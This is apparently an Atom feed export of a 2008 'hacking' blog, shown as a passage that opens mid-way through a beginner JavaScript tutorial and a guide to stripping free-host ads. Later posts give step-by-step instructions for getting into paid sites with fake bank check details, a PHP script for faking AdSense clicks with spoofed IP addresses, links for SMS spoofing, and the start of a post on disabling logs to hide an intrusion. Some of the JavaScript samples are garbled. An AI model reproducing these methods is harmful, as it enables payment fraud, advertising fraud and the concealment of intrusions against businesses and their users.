"b0iler" if it is then I write 'b0iler is a really cool guy!', else (if name isn't equal to b0iler) it prints 'b0iler can not define variables worth a hoot!'. You will notice that I put { and } around the actions after the if and else statements. You do this so that javascript knows how much to do when it is true. When I say true think of it this way:&lt;br /&gt;&lt;br /&gt;if (name == 'b0iler')&lt;br /&gt;as&lt;br /&gt;if the variable name is equal to 'b0iler'&lt;br /&gt;&lt;br /&gt;if the statement name == 'b0iler' is false (name does not equal 'b0iler') then whatever is in the {} (curely brackets) is skipped.&lt;br /&gt;&lt;br /&gt;We now run into relational and equality operators. The relational operators are as follows:&lt;br /&gt;&lt;br /&gt;&gt; - Greater than, if the left is greater than the right the statement is true.&lt;br /&gt;&lt; - Less than, if the left is lesser than the right the statement is true.&lt;br /&gt;&gt;= - Greater than or equal to. If the left is greater than or equal to the right it is true.&lt;br /&gt;&lt;= - Less than or equal to. If the left is lesser than or equal to the right it is true.&lt;br /&gt;&lt;br /&gt;So lets run through a quick example of this, in this example the variable 'lower' is set to 1 and the variable 'higher' is set to 10. If lower is less than higher then we add 10 to lower, otherwise we messed up assigning the variables (or with the if statement).&lt;br /&gt;&lt;br /&gt;&lt;script type="text/javascript"&gt;&lt;br /&gt; &lt;!--&lt;br /&gt; var lower = 1;&lt;br /&gt; var higher = 10;&lt;br /&gt; &lt;br /&gt; if (lower &lt; lower =" lower"&gt; document.write('lower should be greater than higher.. or else I messed up.");&lt;br /&gt; document.write('lower:'+lower+' and higher:'+higher);&lt;br /&gt; //--&gt;&lt;br /&gt; &lt;/script&gt;&lt;br /&gt;&lt;br /&gt;and now the equality operators, you have already seen one of them in an example: if (name == 'b0iler') the equality operators are == for "equal to" and != for "not equal to". Make sure you always put two equal signs (==) because if you put only one (=) then it will not check for equality. This is a common mistake that is often overlooked.&lt;br /&gt;&lt;br /&gt;Now we will get into loops, loops continue the statements in between the curly brackets {} until they are no longer true. There are 2 main types of loops I will cover: while and for loops. Here is an example of a while loop:&lt;br /&gt;&lt;br /&gt;&lt;script type="text/javascript"&gt;&lt;br /&gt; &lt;!--&lt;br /&gt; var name = 'b0iler';&lt;br /&gt; var namenumber = 1;&lt;br /&gt; &lt;br /&gt; while (namenumber &lt;&gt; name = name + name; // could have used: name += name;&lt;br /&gt; document.write(name);&lt;br /&gt; namenumber = namenumber + 1;&lt;br /&gt; }&lt;br /&gt; //--&gt;&lt;br /&gt; &lt;/script&gt;&lt;br /&gt;&lt;br /&gt;First 'name' is set to b0iler, then 'namenumber' is set to 1. Here is where we hit the loop, it is a while loop. What happens is while namenumber is less than 5 it does the following 3 commands inside the brackets {}: name = name + name; document.write(name); namenumber = namenumber + 1; The first statement doubles the length of 'name' by adding itself on to itself. The second statement prints 'name'. And the third statement increases 'namenumber' by 1. So since 'namenumber' goes up 1 each time through the loop, the loop will go through 4 times. After the 4th time 'namenumber' will be 5, so the statement namenumber &lt; 5 will no longer be true.&lt;br /&gt;&lt;br /&gt;Let me quickly go over some short cuts to standard math operators, these shortcuts are:&lt;br /&gt;&lt;br /&gt;variable++; // adds 1 to variable.&lt;br /&gt;variable--; // subtracts 1 from variable.&lt;br /&gt;variable+= something; // adds something to variable. Make sure to use 's if it is a string like:&lt;br /&gt;variable+= 'string';&lt;br /&gt;variable-= 3; // subtracts 3 from variable&lt;br /&gt;variable*= 2; // multiples variable by 2.&lt;br /&gt;&lt;br /&gt;Next loop is the for loop. This loop is unique in that it (defines a variable; then checks if a condition is true; and finally changes a variable after each time through the loop). For the example lets say you want to do the same thing as above. This is how you would do it with a for loop:&lt;br /&gt;&lt;br /&gt;&lt;script type="text/javascript"&gt;&lt;br /&gt; &lt;!--&lt;br /&gt; var name = 'b0iler';&lt;br /&gt; for (var namenumber = 1; namenumber &lt;&gt; name += name; // this is the same as before: name = name + name;&lt;br /&gt; document.write(name);&lt;br /&gt; }&lt;br /&gt; //--&gt;&lt;br /&gt; &lt;/script&gt;b0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0iler&lt;br /&gt;&lt;br /&gt;First the variable name is defined, then it starts the for loop. It assigns 1 to namenumber, then checks if namenumber is less than 5 every time through the loop, and it increases namenumber by 1 every time through the loop (variablename++ means increase the variable by 1). The next 2 lines are the same as with the while loop. But since the for loop handles the declaration of namenumber and the increase every time through the loop it makes it simpler for the scripter and easier to keep track of for people trying to read the code. You can use a while loop if you want, it is all up to the scripter's preference.&lt;br /&gt;&lt;br /&gt;Lets go over that for loop one more time, just for clarity. for (done only the first time; loop continues while this is true; done after every time through the loop)&lt;br /&gt;&lt;br /&gt;That's it for learning javascript, this was really basic and pretty much covered things that are constant in most languages. For javascript specific guides check out the next section of the tutorial. This section was only to give the user enough info to understand the rest of the tutorial. I wish I could go over more, but there are way better tutorials for advanced javascript then one I could ever write.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2. Places To Learn More Advanced Javascript&lt;br /&gt;&lt;br /&gt;I will just provide a list of tutorials and sites with more advanced javascript. If you wish to learn javascript and be able to write your own you will have to look at other people's scripts for examples and read a few more tutorials. I just went over the very basics so you wouldn't be lost.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Pagefinder - Get INSIDERinfo on thousands of topics ... rial2.html - good examples, not really advanced.. prolly a medium level javascript tutorial.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.webdevelopersjournal.com/art" target="_blank"&gt;http://www.webdevelopersjournal.com/art&lt;/a&gt; ... ents2.html - A javascript tutorial on event handles. Fairly advanced.&lt;br /&gt;&lt;br /&gt;Rouyer Design Portfolio Web Site - a classic site, go to the tutorials section and learn a lot of advanced javascript made easy.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://server1.wsabstract.com/javatutors" target="_blank"&gt;http://server1.wsabstract.com/javatutors&lt;/a&gt; - Goes over some specific aspects to advanced javascript work. Useful in many situations.&lt;br /&gt;&lt;br /&gt;Advanced JavaScript Tutorials - The advanced string handling and the forms tutorials are good, I would suggest reading them if you wish to get more into javascripting.&lt;br /&gt;&lt;br /&gt;Coolnerd's Javascript Resource - A nice list of al the javascript operators, statements, objects.. although it might be alittle old I still use it all the time.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;If you want to create your own javascripts for yoursite be warned. Javascripts are very limited in power, but can be the solution to many simple problems. You will have to spend a few weeks learning more advanced javascript in order to make anything really useful. Creating that awsome DHTML (Dynamic HTML) feels really good Dynamic HTML is pretty much javascript that interacts with the user, css, and layers - , &lt;span&gt;, and &lt;layer&gt;.&lt;br /&gt;&lt;br /&gt;Here is some links to good dynamic html sites:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The Dynamic Duo, Cross browser dynamic html tutorial - Goes over things step by step.&lt;br /&gt;&lt;br /&gt;Taylor's dynamic HTML tutorial - That nice webmonkey style that everyone loves.&lt;br /&gt;&lt;br /&gt;Curious Eye DHTML tutorial - This will really get you going making cross browser Dynamic HTML.&lt;br /&gt;&lt;br /&gt;Intro to DHTML - Might be nice if you aren't as html and javascript knowledgable as most DHTML beginners.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Good luck with your adventure into javascript =)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3. Banner Busting &amp;amp; Killing Frames&lt;br /&gt;&lt;br /&gt;I call it banner busting, it is when you use javascript (or other tags) that aren't rendered by the browser the same as normal html tags to get around a popup or banner that free sites automatically put on your page. The basic idea of this is to have a tag that isn't rendered as html right before the html the site adds on their banner so that user's browsers do not see the banner. There is only really one key thing you need to find out in order to kill that banner. This is what tag the site uses as a "key". What I mean by this is what tag does the banner they add come before or after? Try putting up a page with just:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;!-- blah --&gt;&lt;br /&gt;&lt;br /&gt;&lt;!-- blah --&gt;&lt;br /&gt;text&lt;br /&gt;&lt;!-- blah --&gt;&lt;br /&gt;&lt;br /&gt;&lt;!-- blah --&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;now upload that page and view it in a browser. View the source of the page and find where the site added it's banner html. If it came after the and before the then you need to see if it came before or after the&lt;!-- blah --&gt; which is in between those. If it is before, then it is the tag that is the key tag which the site adds it's banner after. If it is under the&lt;!-- blah --&gt; than you know it puts it after the  tag.&lt;br /&gt;&lt;br /&gt;So now that we know where the site adds it's banner html what do we do to stop it? We try to make a "fake" tag and hopefully the site adds it's banner html to the fake one instead. Then we use javascript to print the real one. We can do a few things, here is the list:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;the basic &lt;noscript&gt; - this used to work, as most banners or popups start with some javascript, but now free sites have gotten smart and automaticly add a &lt;/noscript&gt; to stop it.&lt;br /&gt;&lt;br /&gt;&lt;noscript&gt;&lt;br /&gt; &lt;keytag&gt; -this keytag is the decoy. Before/after this tag is where the banner would be.&lt;br /&gt; &lt;/noscript&gt;&lt;br /&gt;&lt;keytag&gt; -this keytag is the real one.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;script&gt; , &lt;style&gt; , &lt;xml&gt; - these are a few examples of tags that will make the add on html and javascript of the site's banner not render by the browser. since it is not in the syntax of css, xml or javascript (it is html) user's browsers will just ignore it.&lt;br /&gt; &lt;br /&gt; &lt;style&gt;&lt;br /&gt; &lt;keytag&gt; -this keytag is the decoy. Before/after this tag is where the banner would be.&lt;br /&gt; &lt;/style&gt;&lt;br /&gt; &lt;keytag&gt; -this keytag is the real one.&lt;br /&gt; &lt;br /&gt; &lt;br /&gt; printing tags with javascript - this one was thought up by acecww and works really well, if you are having problems when you put the real keytag then try using javascript so the site doesn't even see it as the keytag. you get javascript to print the tags one letter at a time.&lt;br /&gt; &lt;br /&gt; &lt;script type="javascript"&gt;&lt;br /&gt; &lt;!--&lt;br /&gt; document.write('&lt;'+'k'+'e'+'y'+'t'+'a'+'g'+'&gt;');&lt;br /&gt; //--&gt;&lt;br /&gt; &lt;/script&gt;&lt;br /&gt;&lt;style&gt;&lt;br /&gt; &lt;keytag&gt; -this keytag is the decoy. Before/after this tag is where the banner would be.&lt;br /&gt; &lt;/style&gt;&lt;br /&gt;&lt;br /&gt;If all worked out you should have a page with no annoying popups or flashing banners. If not I guess you will have to play around a little and figure it out for yourself. Since every free host uses different keytags and methods of adding it's banner I can't go over them all one by one.&lt;br /&gt;&lt;br /&gt;I decided to go over a real example of a free site that add popup ads or banners to every page you have. I'll be using angelfire since I hate them and because that's the one I picked out of my lucky hat. Just remember that sites can change the way they add banners anytime they feel like, so this method might not work the same way as I am showing. Doing this also breaks the TOS (Terms Of Service) with your host, so you might get your site taken down without any warning. Always have complete backups of your site on your harddrive, espechially if you have a hacking site or are breaking the TOS.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;angelfire&lt;br /&gt;&lt;br /&gt;------------------------&lt;br /&gt;begin&lt;br /&gt;------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;!-- Beginning of Angelfire Ad Code Insertion --&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;script language="JavaScript"&gt;&lt;br /&gt; &lt;!--&lt;br /&gt; &lt;br /&gt; (this is where the angelfire ad script would be.)&lt;br /&gt; &lt;br /&gt; //--&gt;&lt;br /&gt; &lt;/script&gt;&lt;br /&gt;&lt;!-- End of Angelfire Ad Code Insertion --&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt; rest of test page&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;------------------------&lt;br /&gt;end&lt;br /&gt;------------------------&lt;br /&gt;&lt;br /&gt;as you can see angelfire puts their ad right after the tag. All they are using to protect us from getting rid of the ad is a so.. we can put something like this to defeat the ad:&lt;br /&gt;&lt;br /&gt;&lt;style&gt;&lt;br /&gt; &lt;body&gt;&lt;br /&gt; &lt;br /&gt; &lt;/style&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;So angelfire's server will add the javascript for thier advertisment after the first  they see. That will put the ad after &lt;style&gt;&lt;body&gt; and before &lt;/style&gt;. This means that user's browsers will think that  and the angelfires ad is css (cascading style sheet).. which is the &lt;/keytag&gt;&lt;/layer&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-3853535528342104394?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/3853535528342104394/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=3853535528342104394' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/3853535528342104394'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/3853535528342104394'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/09/hacking-with-javascript.html' title='Hacking with Javascript. '/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-1074014748962786549</id><published>2008-09-17T11:35:00.000-07:00</published><updated>2008-09-17T11:36:10.291-07:00</updated><title type='text'>How to Break into pr0n sites that accept checks</title><content type='html'>&lt;span style="color:#ff0000;"&gt;Here's how to break into *some* pr0n sites that accept checks. I know most or all CCBill sites are vulnerable to this.&lt;br /&gt;NOTE: Use a proxy.&lt;br /&gt;&lt;br /&gt;First, go to the Fedwire directory at &lt;a href="http://www.fedwiredirectory.frb.org/search.cfm" target="_blank"&gt;http://www.fedwiredirectory.frb.org/search.cfm&lt;/a&gt; . Find a bank somewhere.&lt;br /&gt;I've chosen The Bank of Clovis, in Clovis, New Mexico.&lt;br /&gt;What I need is the routing number. This bank's is: 112206776&lt;br /&gt;&lt;br /&gt;Now I need a pr0n site. For this tutorial, I'll use &lt;a href="http://www.sapphicerotica.com/" target="_blank"&gt;http://www.sapphicerotica.com&lt;/a&gt; .&lt;br /&gt;&lt;br /&gt;So I head over to the Join page. It looks like they accept Online Check!&lt;br /&gt;I sign up with a fake e-mail, they never confirm.&lt;br /&gt;&lt;br /&gt;Now it takes me to the CCBill join page. I put in fake info with a real address (Mcft's). They don't verify this, either.&lt;br /&gt;What is important is the billing info:&lt;br /&gt;Name on account: Just make it your fake name&lt;br /&gt;Routing Number: You got this from Fedwire. No hyphens are used here.&lt;br /&gt;Account number: Just type a random, 7-digit number.&lt;br /&gt;&lt;br /&gt;"Thank you for your purchase, you have been approved!"&lt;br /&gt;I'm in!&lt;br /&gt;&lt;br /&gt;A few notes:&lt;br /&gt;Your account won't last long. As soon as the bank says "that info is fake", the account is gone.&lt;br /&gt;This works on more than just CCBill. It doesn't work on all check-accepting processors, but I've hit at least four different processors that it does.&lt;br /&gt;Not all sites accept checks, probably because of this.&lt;br /&gt;If it doesn't work the first time, switch proxies, find new info, and try again.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-1074014748962786549?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/1074014748962786549/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=1074014748962786549' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/1074014748962786549'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/1074014748962786549'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/09/how-to-break-into-pr0n-sites-that.html' title='How to Break into pr0n sites that accept checks'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-8951517342328371252</id><published>2008-09-17T11:31:00.000-07:00</published><updated>2008-09-17T11:33:56.658-07:00</updated><title type='text'>Wi-fi Without Routers</title><content type='html'>&lt;div style="color: rgb(255, 0, 0);" id="post_message_395"&gt;&lt;b&gt;sharing your existing ethernet internet connection&lt;br /&gt;&lt;br /&gt;1. go to control panel -&gt; network connection.&lt;br /&gt;2. right click on your ethernet connection and click on “properties”.&lt;br /&gt;3. go to “advanced” tab.&lt;br /&gt;4. check “allow other network….. internet connection”&lt;br /&gt;5. in the drop down below select the wifi connection of your pc. if it is disabled, it will be showing your wifi connection already.&lt;br /&gt;6. click on “settings”&lt;br /&gt;7. check the protocols you need to share.i normally use only http and https.&lt;br /&gt;8. click on “ok”.you reach the network connection page. the sharing part is now over.&lt;br /&gt;&lt;br /&gt;finding dns server ip address.&lt;br /&gt;&lt;br /&gt;1. click on start -&gt; run&lt;br /&gt;2. type in cmd in the run prompt&lt;br /&gt;3. in the new window type “ipconfig /all” and press enter.&lt;br /&gt;4. note down your dns server ip address from the screen.&lt;br /&gt;&lt;br /&gt;configuring the wifi&lt;br /&gt;&lt;br /&gt;1. go again to control panel -&gt; network connections.&lt;br /&gt;2. right click on your wifi connection and click “properties”.&lt;br /&gt;3. go to”wireless network” tab.&lt;br /&gt;4. the “use windows to configure my wireless network connection” should be checked.&lt;br /&gt;5. in the preferred network connection section click on add button&lt;br /&gt;6. enter a name of your wish to the network name.&lt;br /&gt;7. network authentication is “open”&lt;br /&gt;8. change data encryption to “disabled”&lt;br /&gt;9. check the “this is a computer to computer …. not used” connection.&lt;br /&gt;10. click “ok”.&lt;br /&gt;11. click on general tab. select “internet protocol(tcp/ip) and click on properties button.&lt;br /&gt;12. now type 192.168.0.1 in ip address, 255.255.255.0 in subnet mask, leave default gateway empty.&lt;br /&gt;13. fill in the dns server entry which you had noted down earlier.&lt;br /&gt;14. click on “ok” and your network is set.&lt;br /&gt;&lt;br /&gt;your network should appear on the wifi network list now. search for wlan on your phone. connect and enjoy browsing on your phone.&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Enjoy!!&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-8951517342328371252?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/8951517342328371252/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=8951517342328371252' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/8951517342328371252'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/8951517342328371252'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/09/wi-fi-without-routers.html' title='Wi-fi Without Routers'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-5669708494873606307</id><published>2008-09-10T07:45:00.000-07:00</published><updated>2008-09-10T07:46:11.762-07:00</updated><title type='text'>Cheating AdSense (use at your own risk)</title><content type='html'>This will most likely get you banned from AdSense but try if you like&lt;br /&gt;create a new file.php or whatever you want to name it&lt;br /&gt;&lt;br /&gt;paste this code in there&lt;br /&gt;&lt;br /&gt;&lt;?php&lt;br /&gt;function rand_ip() {&lt;br /&gt;    $a = rand(1, 9);&lt;br /&gt;    $b = rand(1, 9);&lt;br /&gt;    $c = rand(1, 9);&lt;br /&gt;    $d = rand(1, 9);&lt;br /&gt;    $e = rand(1, 9);&lt;br /&gt;    $f = rand(1, 9);&lt;br /&gt;    $g = rand(1, 9);&lt;br /&gt;    $h = rand(1, 9);&lt;br /&gt;    return $a.$b.".".$c.$d.".".$e.".".$f.".".$g.$h;&lt;br /&gt;}&lt;br /&gt;$_SERVER['REMOTE_ADDR'] = rand_ip();&lt;br /&gt;$ch = curl_init();&lt;br /&gt;$ad_url = "Find this by viewing your page's source.";&lt;br /&gt;curl_setopt($ch, CURLOPT_URL, $ad_url);&lt;br /&gt;curl_setopt($ch, CURLOPT_HEADER, 0);&lt;br /&gt;curl_exec($ch);&lt;br /&gt;curl_close($ch);&lt;br /&gt;?&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Just visit the page, if you did it right it will relocate you to some advertisment page then you just go to the page again.&lt;br /&gt;It counts as a click&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-5669708494873606307?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/5669708494873606307/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=5669708494873606307' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/5669708494873606307'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/5669708494873606307'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/09/cheating-adsense-use-at-your-own-risk.html' title='Cheating AdSense (use at your own risk)'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-8028120598472221735</id><published>2008-08-30T00:41:00.000-07:00</published><updated>2008-08-30T00:51:52.484-07:00</updated><title type='text'></title><content type='html'>&lt;h3 class="smller"&gt;free sms sites&lt;/h3&gt;www.160by2.com&lt;br /&gt;&lt;br /&gt;&lt;div class="para"&gt; &lt;a href="http://www.cellular.co.za/download_f...s_software.htm" target="_blank"&gt;http://www.cellular.co.za/download_f...&lt;wbr&gt;s_software.htm&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.freesms.co.za/" target="_blank"&gt;http://www.freesms.co.za/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.hotsms.com/" target="_blank"&gt;http://www.hotsms.com/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.jfax.de/" target="_blank"&gt;http://www.jfax.de/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.smsfree.co.uk/" target="_blank"&gt;http://www.smsfree.co.uk/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.mobileedge.co.uk/freesms/freesms.htm" target="_blank"&gt;www.mobileedge.co.uk/freesms/freesms.ht&lt;wbr&gt;m&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.sms-sprueche.tv/" target="_blank"&gt;http://www.sms-sprueche.tv/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.sms.mums.it/" target="_blank"&gt;http://www.sms.mums.it/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.smspup.com/" target="_blank"&gt;http://www.smspup.com/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.jump.to/freesms" target="_blank"&gt;www.jump.to/freesms&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.awalsms.com/" target="_blank"&gt;http://www.awalsms.com/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.jinny.com.lb/sms" target="_blank"&gt;www.jinny.com.lb/sms&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.cellular.co.za/send_sms2.htm" target="_blank"&gt;www.cellular.co.za/send_sms2.htm&lt;/a&gt; &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-8028120598472221735?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/8028120598472221735/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=8028120598472221735' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/8028120598472221735'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/8028120598472221735'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/free-sms-sites-www.html' title=''/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-2238766196481784451</id><published>2008-08-30T00:23:00.001-07:00</published><updated>2008-08-30T00:23:54.502-07:00</updated><title type='text'>chek this site for sms spoofing</title><content type='html'>&lt;a href="http://www.sharpmail.co.uk/" target="_blank"&gt;www.sharpmail.co.uk&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-2238766196481784451?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/2238766196481784451/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=2238766196481784451' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/2238766196481784451'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/2238766196481784451'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/chek-this-site-for-sms-spoofing.html' title='chek this site for sms spoofing'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-5699705289686677061</id><published>2008-08-30T00:15:00.000-07:00</published><updated>2008-08-30T00:16:42.459-07:00</updated><title type='text'>SMS from Cisco - Its Free</title><content type='html'>&lt;h3 class="smller"&gt;Register youself with SMS from Cisco.Stay current with Cisco news stories, product updates, security advisories, and more. Get a text message as soon as new content is posted.&lt;br /&gt;&lt;/h3&gt;&lt;br /&gt;&lt;a href="http://www.cisco.com/web/about/facts_info/sms_reg_info.html" target="_blank"&gt;http://www.cisco.com/web/about/facts_inf&lt;wbr&gt;o/sms_reg_info.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Earlier this Service was available only in United States but, now it is also available in India too.&lt;br /&gt;&lt;br /&gt;And Its FREE too&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-5699705289686677061?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/5699705289686677061/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=5699705289686677061' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/5699705289686677061'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/5699705289686677061'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/sms-from-cisco-its-free.html' title='SMS from Cisco - Its Free'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-3392584742158525554</id><published>2008-08-28T20:11:00.000-07:00</published><updated>2008-08-28T20:12:11.667-07:00</updated><title type='text'>How hackers can erase their tracks after hacking</title><content type='html'>&lt;h3 class="smller"&gt;Whenever someone comes in contact with another person, place, or thing, something of that person is left behind. This means that the attacker must disable logging, clear log files, eliminate evidence, plant additional tools, and cover his tracks.&lt;br /&gt;&lt;/h3&gt;&lt;br /&gt;Here are some of the techniques that an attacker can use to cover his tracks:-&lt;br /&gt;(1) Disabling logging – Auditpol was originally included in the NT Resource 